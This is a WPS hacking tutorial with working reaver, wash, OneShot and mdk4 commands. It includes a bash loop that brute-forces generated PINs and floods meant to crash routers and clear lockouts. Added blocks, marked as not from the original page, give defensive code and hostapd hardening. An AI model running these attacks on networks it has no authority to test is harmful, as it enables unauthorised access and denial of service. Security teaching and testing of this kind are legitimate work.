WPS Hacking
WPS was originally developed by Cisco in 2006 as a method to enable convenience and ease of use for users with little knowledge. Either through the push of a button or entering of a PIN users are able to easily connect their devices to their wireless network. Since then, multiple different exploitation tools have been developed with the intent to abuse the PIN. WPS PINs are eight digits in length, making them significantly easier to crack compared to traditional WPA methods.
WPS Connection Methods
There are four methods to connect to a WPS-enabled access point. Each of them is detailed below:

Security Concerns
PIN Method Vulnerability: The 8-digit PIN can be cracked relatively easily through brute-force attacks due to the way the protocol verifies the PIN in two halves.
Physical Security Risks: The PBC method relies on physical security, meaning an unauthorized person within range could potentially push the button and connect to the network.
WPS PIN Anatomy
The WPS PIN is eight digits in length and consists of two primary portions. The first portion is used in the M4 and M5 EAP messages, and the second portion is used in the M6 and M7 EAP messages. Each of these portions is four digits in length. Most would assume that there would be 100,000,000 (10^8) possible digit combinations, but in the case of WPS, this is not true. There are only 11,000 possible combinations.

This is due to how the PIN functions. The first half only has 10^4 possible combinations and the second half has only 10^3 possible combinations. The last digit of the second half is used as a checksum and can be easily calculated. Therefore, there are only 10,000 (10^4) + 1,000 (10^3) possible digit combinations, which is 11,000 total combinations.
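To make the arithmetic above concrete, here is an added Python example (not from the original page) that computes the WPS PIN checksum digit, validates a PIN against it, and returns the 11,000-guess worst case. The checksum rule is the weighted-sum rule defined for WPS PINs; the sample PINs used in the comments are constructed for illustration.

```python
# Added example (not from the original page): why the effective WPS PIN
# keyspace is 11,000 rather than 10^8. The checksum rule is the one defined
# for WPS PINs; sample PINs in comments are constructed.

def wps_checksum(first_seven: int) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN body."""
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("PIN body must be at most 7 digits")
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)   # digits at odd positions from the right, weight 3
        pin //= 10
        accum += pin % 10         # digits at even positions from the right, weight 1
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is exactly 8 digits and its last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(int(pin[:7]))


def split_halves(pin: str):
    """The two halves as the protocol verifies them: digits 1-4 (M4/M5), digits 5-8 (M6/M7)."""
    if len(pin) != 8 or not pin.isdigit():
        raise ValueError("PIN must be 8 digits")
    return pin[:4], pin[4:]


def effective_keyspace() -> int:
    """Worst-case guesses: every first half, then every second half with a derived checksum."""
    first_half = 10 ** 4      # digits 1-4 are confirmed independently by the AP
    second_half = 10 ** 3     # digits 5-7 are free; digit 8 follows from the other seven
    return first_half + second_half


def checksum_valid_pins() -> int:
    """How many of the 10^8 eight-digit strings pass the checksum at all (one in ten)."""
    return 10 ** 8 // 10


if __name__ == "__main__":
    # "12345670" is a well-known default PIN; its checksum digit is 0.
    print(is_valid_wps_pin("12345670"), effective_keyspace())
```

The point a defender should take from this is that the per-half verification, not the checksum, is what collapses the keyspace: the checksum only removes a factor of ten, while confirming the halves separately turns a product of 10^4 and 10^3 into a sum.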
Cracking Methods
Online brute-forcing
Offline brute-forcing, also known as the Pixie Dust Attack
WPS Reconnaissance
In order to analyze a target network, we need to view its WPS information. We can do so with several different tools. Some of the information we hope to obtain is the MAC address of the access point and which WPS version it is using. The MAC address is useful because an easy vendor lookup may tell us whether the access point's vendor is susceptible to different kinds of WPS attacks. This can easily be done with a bit of research, and later we will explore custom PIN generation based on this information. Additionally, we want to find which version of WPS is running, along with which mode it is in, as it will help us narrow down which attack techniques to employ.
If an access point is running WPS version 2.0 it is unlikely that we will be able to use any vector beyond pixie dust attacks, possibly null pin attacks, and brute forcing attempts with very long reattempt periods. This is due to a few factors, such as a locking feature built into most access points. After a certain amount of incorrectly guessed PINs the access point locks and requires either a reboot or timeout for additional PIN guesses.
Putting Card in Monitor Mode and scanning WPS Networks
airmon-ng start wlan0
For reaver to work, use the following command to put the card in monitor mode.
iw dev wlan0 interface add mon0 type monitor
Then we can start monitoring WPS networks
airodump-ng --wps --ignore-negative-one wlan0mon
We could also narrow down our scan further to just our network in question with the following command. We specify the channel with -c and the AP MAC with --bssid
airodump-ng --wps --ignore-negative-one -c 1 --bssid D8:D7:3D:EB:29:D5 wlan0mon

Wash is another great tool for scanning networks with WPS. We can employ a simple command with wash to display all networks with WPS and their respective versions
wash -i wlan0mon
We can display much more verbose output with wash using the following command.
wash -j -i wlan0mon
Finding Vendor
We can find out which vendor is associated with the access point with the following command, specifying the beginning of the MAC address.
grep -i "84-1B-5E" /var/lib/ieee-data/oui.txt
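The grep above only works if the prefix is typed in the dash-separated, upper-case form used by oui.txt, while airodump-ng and wash print colon-separated MACs. This added Python example (not from the original page) normalises any common MAC notation to that prefix form and looks it up in a parser for the oui.txt "(hex)" lines. The embedded table is a constructed excerpt in the oui.txt layout with placeholder vendor names, so it runs without the real file; it also flags locally administered (randomised) MACs, which will never match an OUI.

```python
# Added example (not from the original page): vendor lookup for an AP MAC
# against the oui.txt layout. SAMPLE_OUI_TXT is a constructed excerpt with
# placeholder vendor names; pass the real file's text for actual lookups.
import re

SAMPLE_OUI_TXT = """\
84-1B-5E   (hex)\t\tEXAMPLE VENDOR A
841B5E     (base 16)\t\tEXAMPLE VENDOR A
\t\t\t\t123 Example Street
D8-D7-3D   (hex)\t\tEXAMPLE VENDOR B
D8D73D     (base 16)\t\tEXAMPLE VENDOR B
"""

# Only the "(hex)" lines carry the dash-separated prefix and vendor name.
HEX_LINE = re.compile(r"^([0-9A-F]{2}-[0-9A-F]{2}-[0-9A-F]{2})\s+\(hex\)\s+(.+?)\s*$")


def parse_oui_txt(text: str) -> dict:
    """Map 'XX-XX-XX' prefixes to vendor names, ignoring address and base-16 lines."""
    table = {}
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2)
    return table


def _hex_digits(mac: str) -> str:
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return digits


def oui_prefix(mac: str) -> str:
    """Normalise 'aa:bb:cc:..', 'AA-BB-CC-..' or 'aabbcc..' to the 'AA-BB-CC' oui.txt form."""
    digits = _hex_digits(mac)
    return "-".join(digits[i:i + 2] for i in range(0, 6, 2))


def is_locally_administered(mac: str) -> bool:
    """True if the U/L bit of the first octet is set (randomised or spoofed address)."""
    return bool(int(_hex_digits(mac)[:2], 16) & 0x02)


def lookup_vendor(mac: str, table: dict) -> str:
    """Vendor name for the MAC's OUI, or 'unknown' (including for locally administered MACs)."""
    if is_locally_administered(mac):
        return "unknown"
    return table.get(oui_prefix(mac), "unknown")


if __name__ == "__main__":
    table = parse_oui_txt(SAMPLE_OUI_TXT)
    print(lookup_vendor("D8:D7:3D:EB:29:D5", table))
```

For real use, read /var/lib/ieee-data/oui.txt into a string and pass it to parse_oui_txt; the regex is anchored on the "(hex)" marker, so the address lines that follow each entry are skipped.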
Things to be wary of when testing WPS
The WPS version and wps_locked status: we want to confirm that the access point is not locked, so that clients can still join the network.
The WPS Mode: If we need to press a button to join the network, chances are we are not cracking the PIN this way.
Max PIN Attempts Locking: If the access point locks after a few incorrectly guessed PINs, we likely will not be able to get through all 11,000 possible combinations.
Online PIN Brute-Forcing
Reaver
Reaver is an excellent tool for conducting online password cracking attempts. It offers various options, including Null PIN attacks, custom PIN associations, Pixie Dust Attacks, and general brute-forcing.
iw dev wlan0 interface add mon0 type monitor
reaver -i [interface] -b [BSSID] -c [channel]

reaver -i mon0 -b 22:DD:48:FA:35:E9 -c 1

Bruteforcing Half Known Pins
If we know the first four digits of the WPS PIN, we can use Reaver to bruteforce the remaining four digits. We can provide the known half PIN using the -p option followed by the first four digits. For example, if the known first half of the PIN is 1234, we would use -p 1234.
reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 8487


Testing for Null PIN
If neither of these succeeds, we could also attempt a Null PIN attack. Some access points are vulnerable to Null PIN attacks and will even disclose the WPA-PSK when no PIN is sent. We can do so by employing the following command, specifying the Null PIN with -p "" or -p " ".
reaver -b 7E:A3:5A:22:C5:90 -c 1 -i mon0 -p " "

Retrieving WPA-PSK using Reaver with a Known PIN
If one of our brute forcing attempts succeeds, we can use the following command to verify the captured PIN. Alternatively, if the access point has a label with the PIN physically printed on the backside of the router, we can use this information to retrieve the WPA-PSK for the WiFi network. This method leverages the default PIN provided by the manufacturer to potentially gain access to the network. For the technique of using the PIN printed on the label to retrieve the WPA-PSK, the access point (AP) must be in label mode.
reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 84870575

Secured Access Points
Traditionally, online brute-forcing attempts have been utilized in retrieving the WPS PIN and WPA-PSK. However, in recent years, manufacturers have become wiser to these attacks. As such, locking has been utilized to prevent these traditional bruteforcing techniques. The most recent vendors only allow up to 3 incorrect attempts. After each incorrect attempt, the AP will lock for 60 seconds. After 10 incorrect attempts, the AP will lock for 365 days.
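Lockout is the vendor's mitigation; on an AP you administer yourself, the stronger fix is to remove the PIN method from the WPS configuration altogether. The following is an added example (not from the original page) of two hostapd.conf fragments: the first exposes the AP PIN to external registrars, which is exactly what the online brute force in this section targets, and the second keeps push-button enrolment while disabling the AP PIN and locking out new registrars. Interface name, SSID and the PIN value are constructed.

```ini
# Added example (not from the original page): hostapd.conf WPS fragments.
# Interface, SSID and PIN value are constructed placeholders.

# --- Weak: AP PIN exposed to external registrars, AP setup not locked ---
interface=wlan0
ssid=example-ap
eap_server=1
# 2 = WPS enabled and network already configured
wps_state=2
# A static AP PIN is what an online PIN brute force guesses, half by half
ap_pin=12345670
# New external registrars may still configure the AP
ap_setup_locked=0
config_methods=label display push_button keypad

# --- Hardened: same AP, PIN method removed, PBC kept ---
interface=wlan0
ssid=example-ap
eap_server=1
wps_state=2
# No ap_pin line: with no AP PIN there is nothing for a PIN brute force to guess
# Refuse new external registrars outright
ap_setup_locked=1
# Advertise only the push-button method
config_methods=push_button
# Keep a record of PIN requests hostapd receives, for review
wps_pin_requests=/var/run/hostapd_wps_pin_requests
```

The two fragments are alternatives for one AP, not one file; hostapd reads a single interface block. If WPS is not needed at all, wps_state=0 disables it entirely, which also removes the PBC exposure discussed later on this page.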


Using Multiple Pre-defined PINs
While it is possible to bruteforce the WPS PIN using Reaver, we can also use a custom wordlist of potential PINs. In this section, we will explore how to generate possible PINs for a WiFi network using wpspin and then create a custom bash script to bruteforce the access point with these PINs.
The WPSPin tool is a powerful tool that includes many different PIN generation algorithms. This tool allows us to once again provide the BSSID of our target network and receive a list of possible default PINs.
git clone https://github.com/drygdryg/wpspin.git
sudo python setup.py install
wpspin -A 60:38:E0:A2:3D:2A
WPSPin outputs a variety of possible PINs for valid BSSIDs. To retrieve the WPA-PSK from a known PIN, we can use the following command.
sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p 73834410
In the above command, -l sets the time to wait if the access point locks WPS PIN attempts, which is set to 100 seconds. The -r option specifies the recurring delay, meaning the command will sleep for 45 seconds every 3 attempts. The --max-attempts=1 specifies that the tool will only attempt the PIN one time. This option ensures that the PIN is tested just once, rather than multiple attempts.
We can extract only the pins from the wpspin output using a combination of grep and tr commands:
wpspin -A 60:38:E0:A2:3D:2A | grep -Eo '\b[0-9]{8}\b' | tr '\n' ' '
We can now store this output in a variable of a bash script and use it for brute-forcing WPS
#!/bin/bash
# Define the list of generated PINs
PINS='76142673 24952910 31080279 31080279 10149713 42705239 65814352 35934868 20660413 53157652 84636386 91629487 52285349 28428015 51018658 66505471 04217176 12345670 20172527 46264848 76229909 62327145 10864111 31957199 30432031 71412252 68175542 95661469 95719115 48563710 20854836 43977680 05294176 99956042 35611530 67958146 34259283 94229882 95755212'

# Loop through each PIN in the list
for PIN in $PINS; do
    echo "Attempting PIN: $PIN"
    # Execute reaver command with the given PIN
    sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 72:40:6E:74:2F:3B -v -c 1 -p "$PIN"
    # Check if the command executed successfully
    if [ $? -ne 0 ]; then
        echo "An error occurred while attempting PIN: $PIN"
    fi
done
echo "PIN guesses complete."
For each generated PIN attempted, the script will try the PIN only once, and then wait for 100 seconds if the access point (AP) locks. Additionally, for every three attempts made, it will pause for 45 seconds. The script iterates through all the PINs in the list, which can be seen in action in the example below:

Using PIN Generation Tools
When crafting an online brute-forcing attempt, it can be cumbersome to guess all 11,000 possible PINs, especially considering most access points are utilizing default PINs. Luckily, over the years many different libraries and tools have been developed to generate these default PINs. Some of these include the Arcadyan, Vodafone EasyBox, and ComputePIN default generation algorithms.
Pixie Dust Attack
Some vendors such as Ralink, Realtek, MediaTek, and Broadcom are susceptible to offline brute-forcing techniques through the Pixie Dust attack. This is due to bad randomization during nonce generation. The E-S1 and E-S2 nonces are 128 bits long, so blindly brute-forcing the hash values would take a very long time. Because certain vendors generate these nonces in a bad or predictable way, we can recover the nonce values, which makes brute-forcing the PIN halves from the E-Hash1 and E-Hash2 values much quicker. This eliminates the need to conduct online brute-forcing through every iteration of a possible PIN.
Reaver
We can use Reaver to perform a Pixie Dust attack against it, specifying the -K (or --pixie-dust) option.
reaver -K 1 -vvv -b 7E:E7:15:97:2D:6F -c 1 -i mon0

We can subsequently use this PIN to obtain the PSK (Pre-Shared Key) for the WiFi network.
reaver -b 7E:E7:15:97:2D:6F -c 1 -p 32452370 -i mon0
Oneshot
To perform a Pixie Dust attack using OneShot, we again require our interface to be in monitor mode, this time created with airmon-ng. However, before proceeding, we should delete the previously configured mon0 interface.
iw dev mon0 del
airmon-ng start wlan0
Similar to Reaver, OneShot also includes the -K (or --pixie-dust) argument. Let's apply this option and initiate the attack.
sudo python3 /opt/OneShot/oneshot.py -i wlan0mon -b 7E:E7:15:97:2D:6F -K

Push Button Configuration
Push Button Configuration (PBC) is a simple and user-friendly method for connecting devices to a wireless network using Wi-Fi Protected Setup (WPS). It’s particularly useful for users who want to avoid entering complex passwords. PBC is a feature of WPS that allows users to connect devices to a Wi-Fi network by simply pressing a physical button on the router/AP and the connecting device, instead of entering a password.
How Does PBC Work?
Physical Button Press: Most routers and access points have a WPS button that triggers PBC.
Automatic Pairing: After pressing the button, the router will listen for new device requests to connect for a set time (usually two minutes). During this period, any device that requests access can connect without needing a password.
Device Side Interaction: The connecting device (e.g., smartphone, smart TV, etc.) typically has an option to connect via WPS. After selecting this, the device searches for routers or access points in PBC mode and establishes a connection, without the need to enter a password manually.
We can use airodump-ng to check if the Wi-Fi network is in Push Button Configuration (PBC) mode
airodump-ng wlan0mon -c 1 --wps

Consider a scenario where we are performing a wireless penetration test and discover an access point with WPS enabled. Since we're onsite at the client's office, we have direct access to the router. In this situation, we can physically press the WPS button on the back of the router, allowing us to connect to the access point without having to manually enter a password. We can achieve this by using tools such as oneshot for automated execution, or manually by utilizing wpa_cli to establish the connection.
We can also use Oneshot to automate the exploitation of PBC. Oneshot will automatically generate the valid WPS PIN and WPA passphrase for the access point. To use Oneshot, we first need to enable monitor mode on the wlan0 interface by using airmon-ng. Once monitor mode is enabled, we can run Oneshot with the --pbc argument to connect using PBC mode.
python3 /opt/OneShot/oneshot.py -i wlan0mon --pbc

wpa_cli
First, we need to scan for available access points to obtain their BSSID. This can be done using the iwlist scan command, as demonstrated below.
iwlist wlan0 scan | grep 'Cell\|Quality\|ESSID\|IEEE'

Alternatively, we can achieve the same result with wpa_cli.
wpa_cli scan_results
Once we have identified our target BSSID, we immediately press the WPS button on the back of the router and execute the following command.
wpa_cli wps_pbc D8:D6:3D:EB:29:D5

After a few seconds, we can check wpa_supplicant to verify that we've successfully connected to the Wi-Fi network.
systemctl status wpa_supplicant

We can use dhclient followed by the interface name, such as wlan0, to obtain a valid IP address within the access point's subnet.
sudo dhclient wlan0

Crashing a Target AP with MDK4
During our efforts of retrieving the PIN and WPA-PSK, we are likely to encounter an access point locking at some point. In this section, we will demonstrate how flooding and crashing the AP can be used as a potential bypass. There are a few different kinds of WPS locks, one of which is a delay period that occurs after too many incorrect guesses. As we demonstrated in an earlier section, we can bypass this using our advanced command, specifying the sleep period and time between attempts:
sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11
The second kind of WPS lock is one that requires the AP to be reset, either through a power cycle or some other means, after too many incorrect PIN attempts. This can dissuade us as attackers from continuing WPS PIN retrieval techniques. However, Authentication Denial-of-Service and EAPOL Start and Logoff packet injection flooding attacks can grant us this access point reset. In some cases, this will remove the WPS lock. It is worth noting that not all access points are vulnerable to these two aggressive techniques, and these techniques are truly a last resort. In some instances, the access point will crash, while the WPS lock remains enabled.
Suppose our access point displays a locked status. This will halt all PIN attempts occurring in the first terminal. Luckily, MDK4 includes functionality in its attack modules for both Authentication Denial-of-Service and EAPOL Start and Logoff Packet Injection flooding. In our third terminal, we can employ the following command to test for Authentication Denial-of-Service flooding. We specify attack module a for Authentication Denial-of-Service, and our access point's MAC address with -a.
sudo mdk4 wlan0mon a -a 60:38:E0:XX:XX:XX

Crashing a target access point (AP) with MDK4 is a method that only works on very old routers. Recent routers are not vulnerable to this type of Denial-of-Service (DoS) attack.
Authentication Denial-of-Service attacks continuously spoof MAC addresses to authenticate to the network. This floods the access point's client list, and in many cases causes the access point to crash, thus resetting it. This can allow us to regain an unlocked WPS status. Alternatively, we could attempt this same attack with the Intelligent Test on the access point. The Intelligent Test connects clients to the AP and reinjects sniffed data to keep them alive.
sudo mdk4 wlan0mon a -i 60:38:E0:XX:XX:XX
If our access point is still displaying a locked status in our second terminal, we could then attempt an EAPOL Start and Logoff Packet Injection attack. In the third terminal, we have our choice of EAPOL Start or EAPOL Logoff messages. To use EAPOL Start messages, we run the following command.
mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX
To use EAPOL Logoff messages to kick clients off the network, we can employ the command seen below.
mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX -l
Alternatively, we could leave our EAPOL Start message MDK4 command running in our third terminal and begin the EAPOL Logoff messages in a fourth terminal. We can also utilize a deauthentication attack to kick clients.
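Both floods described in this section have a simple wire-level signature: a burst of Authentication frames from many distinct source MACs, or a burst of EAPOL-Start frames from one source, far above anything a real client population produces. The following is an added Python example (not from the original page) of sliding-window detection logic for both, run over a constructed list of frame summaries rather than a live capture. Each record is (timestamp in seconds, source MAC, frame kind); the window size and thresholds are illustrative assumptions to be tuned per deployment.

```python
# Added example (not from the original page): sliding-window detection of an
# authentication flood (many distinct sources) and an EAPOL-Start flood (one
# source, many frames). Input records are constructed; thresholds are assumptions.
from collections import deque

WINDOW_S = 5.0                 # assumed window length
AUTH_DISTINCT_SRC_LIMIT = 30   # assumed: distinct authenticating stations per window
EAPOL_START_LIMIT = 20         # assumed: EAPOL-Start frames per source per window


def detect_floods(records, window_s=WINDOW_S,
                  auth_limit=AUTH_DISTINCT_SRC_LIMIT,
                  eapol_limit=EAPOL_START_LIMIT):
    """Return alerts as (timestamp, kind, detail); one alert per flood, not per frame."""
    records = sorted(records)              # (ts, src_mac, frame_kind)
    auth_window = deque()                  # recent (ts, src) Authentication frames
    eapol_windows = {}                     # src -> deque of recent EAPOL-Start timestamps
    alerts = []
    auth_alerted = False
    eapol_alerted = set()

    for ts, src, kind in records:
        if kind == "auth":
            auth_window.append((ts, src))
            while auth_window and ts - auth_window[0][0] > window_s:
                auth_window.popleft()
            distinct = len({s for _, s in auth_window})
            if distinct > auth_limit and not auth_alerted:
                alerts.append((ts, "auth_flood",
                               f"{distinct} distinct stations authenticated within {window_s}s"))
                auth_alerted = True
        elif kind == "eapol_start":
            q = eapol_windows.setdefault(src, deque())
            q.append(ts)
            while q and ts - q[0] > window_s:
                q.popleft()
            if len(q) > eapol_limit and src not in eapol_alerted:
                alerts.append((ts, "eapol_start_flood",
                               f"{len(q)} EAPOL-Start frames from {src} within {window_s}s"))
                eapol_alerted.add(src)
    return alerts


def constructed_capture():
    """Constructed input: three real clients, then a spoofed-source auth flood, then an EAPOL-Start burst."""
    recs = []
    # Benign: each real client authenticates once, twenty seconds apart
    for i, mac in enumerate(["aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "aa:bb:cc:00:00:03"]):
        recs.append((10.0 + 20 * i, mac, "auth"))
    # Flood: 60 distinct locally administered sources within about two seconds
    for i in range(60):
        recs.append((100.0 + i * 0.03, f"02:00:00:00:{i // 256:02x}:{i % 256:02x}", "auth"))
    # EAPOL-Start burst: 40 frames from a single source within one second
    for i in range(40):
        recs.append((200.0 + i * 0.025, "02:00:00:00:ff:01", "eapol_start"))
    return recs


if __name__ == "__main__":
    for alert in detect_floods(constructed_capture()):
        print(alert)
```

In practice the records would come from a monitor-mode capture filtered to frames addressed to the AP's BSSID; the logic stays the same. Pairing these alerts with the AP's own WPS lock and reboot events is what lets a defender tell a crash caused by a flood apart from an ordinary power cycle.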